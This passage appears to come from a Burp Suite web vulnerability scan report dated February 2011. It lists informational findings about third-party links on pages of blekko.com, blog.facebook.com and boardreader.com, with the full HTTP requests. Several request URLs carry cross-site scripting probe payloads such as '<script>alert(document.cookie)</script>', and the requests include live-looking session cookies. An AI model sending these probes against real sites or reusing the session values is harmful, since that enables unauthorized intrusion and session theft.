https://d1ptqnnggq4xie.cloudfront.net/045/gz/78f7e6ce9fb86183_search.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/8256cf84549b97c3_base64.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/a6c23cd1d0714d29_jquery.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/eda7f3f0a9246dd3_rsa.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/eed7f85792e9ea39_prng4.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/images/wait30trans.gif
https://d1ptqnnggq4xie.cloudfront.net/045/gz/theme19/40a3770253c50b9a_style.css
https://d1ptqnnggq4xie.cloudfront.net/045/gz/theme19/imgs/icons/x.png
https://d1ptqnnggq4xie.cloudfront.net/045/gz/theme19/imgs/logo_home.png

Request

GET /join?de32a%22%3E%3Cscript%3Ealert(1)%3C/script%3E784d2feb8f0=1 HTTP/1.1
Host: blekko.com
Connection: keep-alive
Referer: http://burp/show/41
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=352926924; suggestedSlashtagsList=1; v=3; t=1296674604621; fbl=2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 20:06:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=115
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 20:06:34 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
X-Blekko-PT: a4bc8c52ab18861138b16f665a6e92c7
Content-Length: 7287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="https://www.facebook.com/2008/fbml">
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<link rel="stylesheet" type="text/css" href="https://d1ptqnnggq4xie.cloudfront.net/045/gz/theme19/40a3770253c50b9a_style.css" media="all" />
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/a6c23cd1d0714d29_jquery.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/2d59ccdc20e73672_jquery.json-2.2.min.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/66e687887728028f_jsbn.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/eed7f85792e9ea39_prng4.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/6f6e31bd3dcc5626_rng.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/eda7f3f0a9246dd3_rsa.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/8256cf84549b97c3_base64.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/78f7e6ce9fb86183_search.js"></script>
...[SNIP]...
<span class="close" onclick="javascript:toggleID('prefsPane');"><img width="16" height="16" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/theme19/imgs/icons/x.png" alt="close icon" title="Close Preferences" style="margin: -2px -2px 0 0;" /></span>
...[SNIP]...
<a href="http://blekko.com/"><img src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/theme19/imgs/logo_home.png" alt="blekko logo" title="home" width="168" height="38" id="logo" style="float:left;margin:0 0 2px 14px;" /></a>
...[SNIP]...
<center><img src='https://d1ptqnnggq4xie.cloudfront.net/045/gz/images/wait30trans.gif'></center>
...[SNIP]...
</div>
<script src="https://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

17.53. https://blekko.com/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://blekko.com
Path:	/login

Issue detail

The page was loaded from a URL containing a query string:

https://blekko.com/login?f7a44%22%3E%3Cscript%3Ealert(1)%3C/script%3E047c1089db5=1

The response contains the following links to other domains:

https://connect.facebook.net/en_US/all.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/0fbbe2b7b6753520_jquery.jcryption.min.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/2d59ccdc20e73672_jquery.json-2.2.min.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/66e687887728028f_jsbn.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/6f6e31bd3dcc5626_rng.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/78f7e6ce9fb86183_search.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/8256cf84549b97c3_base64.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/a6c23cd1d0714d29_jquery.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/eda7f3f0a9246dd3_rsa.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/eed7f85792e9ea39_prng4.js
https://d1ptqnnggq4xie.cloudfront.net/045/gz/images/wait30.gif
https://d1ptqnnggq4xie.cloudfront.net/045/gz/theme19/40a3770253c50b9a_style.css
https://d1ptqnnggq4xie.cloudfront.net/045/gz/theme19/imgs/logo_home.png

Request

GET /login?f7a44%22%3E%3Cscript%3Ealert(1)%3C/script%3E047c1089db5=1 HTTP/1.1
Host: blekko.com
Connection: keep-alive
Referer: http://burp/show/42
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=352926924; suggestedSlashtagsList=1; v=3; t=1296674604621; fbl=2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 20:06:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=115
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 20:06:48 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
X-Blekko-PT: b2866cae1b02fce515a02450be725ffd
Content-Length: 10603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="https://www.facebook.com/2008/fbml">
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<link rel="stylesheet" type="text/css" href="https://d1ptqnnggq4xie.cloudfront.net/045/gz/theme19/40a3770253c50b9a_style.css" media="all" />
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/a6c23cd1d0714d29_jquery.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/2d59ccdc20e73672_jquery.json-2.2.min.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/0fbbe2b7b6753520_jquery.jcryption.min.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/66e687887728028f_jsbn.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/eed7f85792e9ea39_prng4.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/6f6e31bd3dcc5626_rng.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/eda7f3f0a9246dd3_rsa.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/8256cf84549b97c3_base64.js"></script>
<script type="text/javascript" src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/78f7e6ce9fb86183_search.js"></script>
...[SNIP]...
<center><img width="30" height="30" src='https://d1ptqnnggq4xie.cloudfront.net/045/gz/images/wait30.gif'></center>
...[SNIP]...
<a href="http://blekko.com"><img src="https://d1ptqnnggq4xie.cloudfront.net/045/gz/theme19/imgs/logo_home.png" alt="blekko logo" title="home" width="168" height="38" id="logo" style="float:left;margin:0 0 2px 14px;" /></a>
...[SNIP]...
</div>
<script src="https://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

17.54. http://blog.facebook.com/blog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.facebook.com
Path:	/blog.php

Issue detail

The page was loaded from a URL containing a query string:

http://blog.facebook.com/blog.php?post=382978412130

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/y4/r/gBW03hbaFdt.css
http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yb/r/iFkfQ9u2F-V.css
http://b.static.ak.fbcdn.net/rsrc.php/yr/r/sCuOEMG5tKV.css
http://b.static.ak.fbcdn.net/rsrc.php/yw/r/zZtinCl0Fsa.css
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs446.snc4/49139_201488_195799_t.jpg
http://sphotos.ak.fbcdn.net/hphotos-ak-ash1/hs486.ash1/26604_428323791728_20531316728_5178675_1312059_n.jpg
http://sphotos.ak.fbcdn.net/hphotos-ak-snc3/hs486.snc3/26604_428311371728_20531316728_5178417_6197603_n.jpg
http://sphotos.ak.fbcdn.net/hphotos-ak-snc3/hs506.snc3/26604_428311331728_20531316728_5178415_5901581_n.jpg
http://static.ak.fbcdn.net/rsrc.php/yG/r/Y22eRtvgq_N.css
http://static.ak.fbcdn.net/rsrc.php/yL/r/I8McpCyINdx.css
http://static.ak.fbcdn.net/rsrc.php/yO/r/QThLuqlLaW5.css
http://static.ak.fbcdn.net/rsrc.php/yS/r/3TBzrfVdgAR.gif
http://static.ak.fbcdn.net/rsrc.php/ya/r/sF_0-1qzmRi.css
http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js
http://static.ak.fbcdn.net/rsrc.php/yg/r/V8Yrm0eKZpi.gif
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico
http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png

Request

GET /blog.php?post=382978412130 HTTP/1.1
Host: blog.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=Fq5JTSw9c381ZCmsmGv_p6Xn; expires=Fri, 01-Feb-2013 19:18:46 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=i0PHb; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fblog.facebook.com%2Fblog.php%3Fpost%3D382978412130; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fblog.facebook.com%2Fblog.php%3Fpost%3D382978412130; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 19:18:46 GMT
Content-Length: 30164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yL/r/I8McpCyINdx.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yb/r/iFkfQ9u2F-V.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yr/r/sCuOEMG5tKV.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yw/r/zZtinCl0Fsa.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/ya/r/sF_0-1qzmRi.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yO/r/QThLuqlLaW5.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/y4/r/gBW03hbaFdt.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yG/r/Y22eRtvgq_N.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<div class="UIImageBlock clearfix"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://static.ak.fbcdn.net/rsrc.php/yS/r/3TBzrfVdgAR.gif" alt="Subscribe to RSS Feed" width="16" height="15" /><a class="UIImageBlock_Content UIImageBlock_ICON_Content" href="/atom.php">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_MED_Image" href="http://www.facebook.com/alexli?ref=blog" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs446.snc4/49139_201488_195799_t.jpg" /></a>
...[SNIP]...
<div class="photo_img"><img class="img_loading img" src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc3/hs506.snc3/26604_428311331728_20531316728_5178415_5901581_n.jpg" onload="var img = this; onloadRegister(function() { adjustImage(img); });" /></div>
...[SNIP]...
<div class="photo_img"><img class="img_loading img" src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc3/hs486.snc3/26604_428311371728_20531316728_5178417_6197603_n.jpg" onload="var img = this; onloadRegister(function() { adjustImage(img); });" /></div>
...[SNIP]...
<div class="photo_img"><img class="img_loading img" src="http://sphotos.ak.fbcdn.net/hphotos-ak-ash1/hs486.ash1/26604_428323791728_20531316728_5178675_1312059_n.jpg" onload="var img = this; onloadRegister(function() { adjustImage(img); });" /></div>
...[SNIP]...
<div class="UIImageBlock clearfix"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://static.ak.fbcdn.net/rsrc.php/yg/r/V8Yrm0eKZpi.gif" alt="" width="16" height="16" /><div class="UIImageBlock_Content UIImageBlock_ICON_Content fsm fwn fcg">
...[SNIP]...
<div class="UIImageBlock clearfix"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://static.ak.fbcdn.net/rsrc.php/yg/r/V8Yrm0eKZpi.gif" alt="" width="16" height="16" /><div class="UIImageBlock_Content UIImageBlock_ICON_Content fsm fwn fcg">
...[SNIP]...
<div class="UIImageBlock clearfix"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://static.ak.fbcdn.net/rsrc.php/yg/r/V8Yrm0eKZpi.gif" alt="" width="16" height="16" /><div class="UIImageBlock_Content UIImageBlock_ICON_Content fsm fwn fcg">
...[SNIP]...
<div class="UIImageBlock clearfix"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://static.ak.fbcdn.net/rsrc.php/yg/r/V8Yrm0eKZpi.gif" alt="" width="16" height="16" /><div class="UIImageBlock_Content UIImageBlock_ICON_Content fsm fwn fcg">
...[SNIP]...
<div class="UIImageBlock clearfix"><img class="UIImageBlock_Image UIImageBlock_ICON_Image img" src="http://static.ak.fbcdn.net/rsrc.php/yg/r/V8Yrm0eKZpi.gif" alt="" width="16" height="16" /><div class="UIImageBlock_Content UIImageBlock_ICON_Content fsm fwn fcg">
...[SNIP]...

17.55. http://boardreader.com/a/2mdn.net/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/a/2mdn.net/x22

Issue detail

The page was loaded from a URL containing a query string:

http://boardreader.com/a/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1

The response contains the following links to other domains:

http://clickaider.com/
http://hit.clickaider.com/clickaider.js
http://hit.clickaider.com/i/button-30.gif
http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript
http://www.google-analytics.com/urchin.js

Request

GET /a/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:04:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verify-v
...[SNIP]...
</a> | 
<a class="footer_m" target="_blank" href="http://clickaider.com/" title="Tracked by ClickAider"><img src="http://hit.clickaider.com/i/button-30.gif" border="0"/></a>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>

<noscript>
<img src="http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript" alt="ClickAider" border="0" width="1" height="1" />
</noscript>
...[SNIP]...

17.56. http://boardreader.com/affiliate/gagbanner.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/affiliate/gagbanner.html

Issue detail

The page was loaded from a URL containing a query string:

http://boardreader.com/affiliate/gagbanner.html?size=top&rand=32395144

The response contains the following link to another domain:

http://www.opensubtitles.org/

Request

GET /affiliate/gagbanner.html?size=top&rand=32395144 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:28:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 789
Content-Type: text/html; charset=UTF-8
Connection: close

<table class="gagbanner_top" border="0" cellpadding="0" cellspacing="0" width="468" height="60">
   <tr>
       <td align="center">
                                   <div style="font: 10px arial;margin-bottom:5px;">Featured Partner<
...[SNIP]...
<IMG src="http://icons.boardreader.com/9b/2c/9b2cd771cad730f4e29a6e5b29c208fa.png" width="16" border="0" style="vertical-align:middle;" />
                <a style="color:#105CB6;font:normal 13px arial;" target="_blank" href="http://www.opensubtitles.org" title="">www.opensubtitles.org</a>
...[SNIP]...

17.57. http://boardreader.com/domain/2mdn.net/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/2mdn.net/x22

Issue detail

The page was loaded from a URL containing a query string:

http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1

The response contains the following links to other domains:

http://clickaider.com/
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://hit.clickaider.com/clickaider.js
http://hit.clickaider.com/i/button-30.gif
http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1 HTTP/1.1
Host: boardreader.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: human_user=true; __utmb=69622787; __utmc=69622787; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 20:08:19 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 02:08:24 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</h2>

           <OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="600" HEIGHT="300" id="searcherGraph">
           <PARAM NAME=movie VALUE="/Charts/MSCombiDY2D.swf">
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</a> | 
<a class="footer_m" target="_blank" href="http://clickaider.com/" title="Tracked by ClickAider"><img src="http://hit.clickaider.com/i/button-30.gif" border="0"/></a>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>

<noscript>
<img src="http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript" alt="ClickAider" border="0" width="1" height="1" />
</noscript>
...[SNIP]...

17.58. http://boardreader.com/domain/aol.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/aol.com

Issue detail

The page was loaded from a URL containing a query string:

http://boardreader.com/domain/aol.com?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&from_site_id=1404604

The response contains the following links to other domains:

http://clickaider.com/
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://hit.clickaider.com/clickaider.js
http://hit.clickaider.com/i/button-30.gif
http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /domain/aol.com?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&from_site_id=1404604 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:00:59 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:01:05 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</h2>

           <OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="600" HEIGHT="300" id="searcherGraph">
           <PARAM NAME=movie VALUE="/Charts/MSCombiDY2D.swf">
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</a> | 
<a class="footer_m" target="_blank" href="http://clickaider.com/" title="Tracked by ClickAider"><img src="http://hit.clickaider.com/i/button-30.gif" border="0"/></a>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>

<noscript>
<img src="http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript" alt="ClickAider" border="0" width="1" height="1" />
</noscript>
...[SNIP]...

17.59. http://boardreader.com/domain/cafemom.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/cafemom.com

Issue detail

The page was loaded from a URL containing a query string:

http://boardreader.com/domain/cafemom.com?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&from_site_id=655408

The response contains the following links to other domains:

http://clickaider.com/
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://hit.clickaider.com/clickaider.js
http://hit.clickaider.com/i/button-30.gif
http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /domain/cafemom.com?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&from_site_id=655408 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:57:30 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:57:37 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</h2>

           <OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="600" HEIGHT="300" id="searcherGraph">
           <PARAM NAME=movie VALUE="/Charts/MSCombiDY2D.swf">
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</a> | 
<a class="footer_m" target="_blank" href="http://clickaider.com/" title="Tracked by ClickAider"><img src="http://hit.clickaider.com/i/button-30.gif" border="0"/></a>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>

<noscript>
<img src="http://hit.clickaider.com/pv?c=9f671068-5&ctype=noscript" alt="ClickAider" border="0" width="1" height="1" />
</noscript>
...[SNIP]...

17.60. http://boardreader.com/domain/myegy.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/myegy.com

Issue detail

